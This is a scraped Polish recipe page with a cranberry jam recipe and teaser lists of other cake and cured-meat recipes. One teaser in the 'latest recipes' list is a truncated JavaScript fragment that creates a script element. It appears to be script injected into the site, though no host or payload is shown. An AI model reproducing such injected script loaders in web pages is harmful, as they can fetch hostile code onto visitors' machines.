Dżem z żurawiny
Źródło: https://smakijackaw.blogspot.com/2024/09/dzem-z-zurawiny.html
SKŁADNIKI-2 kg żurawiny-sok z 2 cytryn-cukier żelujący 3:1 / 0,5 kg-3 saszetki 40 g żelfix 3:1-400 ml wodyWYKONANIEŻurawinę płuczemy przebieramy i mrozimy z tydzień ,następnie rozmrażamy i przepuszczamy przez maszynkę na sitku 8 mm lub na wyciskarce wolno obrotowej z tendencją grubej pulpy. Następnie wszystkie składniki dajemy do jednego garnka i na wolnym ogniu gotujemy do pożądanej konsystencji, mając na uwadze, że całość jeszcze zgęstnieje. Przekładamy do słoiczków,...
Najnowsze przepisy
Poznaj rybę po grecku z fantastycznie dobranymi warzywami... ⇖ 32
Dzisiaj krótko i do rzeczy.To już kolejny piernik na moim... ⇖ 16
Łaciatek z makiem to ciasto, które przyciąga wzrok już... ⇖ 23
Ciasto jest wyśmienite, wielowarstwowe począwszy od... ⇖ 30
(function(){ u7xb=document.createElement("script");u7xb.type ⇖ 21
Rurki z kremem Kinder to przepis, który smakiem przenosi... ⇖ 16
Przepisy z bloga
SUROWIEC-400 g mięso z łopatki-300 g mięso drobiowe-300... ⇖ 235
SUROWIEC I ROZDRABNIANIEMielenie odbywało się na maszynce... ⇖ 194
SKŁADNIKI I PRZYPRAWY I MATERIAŁY POMOCNICZE-karkówka... ⇖ 1457
SUROWIECWP-boczek bez skóry 1 kg-pachwina bez skóry1... ⇖ 203
SUROWIEC I ROZDRABNIANIE-łopatka 2 kg/8 mm-pachwina 0,5... ⇖ 254
SUROWIEC, PRZYPRAWY I MATERIAŁY POMOCNICZE-ćwiartki z... ⇖ 269
SUROWIEC, PRZYPRAWY I MATERIAŁY POMOCNICZE-boczek ze... ⇖ 286
SUROWIEC, PRZYPRAWY I MATERIAŁY POMOCNICZE-karkówka... ⇖ 465
Przepisy na czasie
Prosty przepis na klasyczny drożdżowy makowiec. Przepis... ⇖ 2739
Masz ochotę na coś słodkiego bez pieczenia? Zrób sernik... ⇖ 2100
Piernik przekładany kremem to jedno z tych ciast, które... ⇖ 1447
NAJLEPSZY PRZEPIS NA CIASTO NA PIEROŻKIBardzo lubię... ⇖ 846
To niezwykle proste ciasto piernikowe, które zawsze się... ⇖ 749
Sernik łaciaty z brzoskwiniami i makiem to ciasto, które... ⇖ 679
Cześć! Dzisiaj robimy ciasto lion bez pieczenia, to... ⇖ 647
Kremowe, delikatne ciasto z białą czekoladą i cukierkami... ⇖ 647









































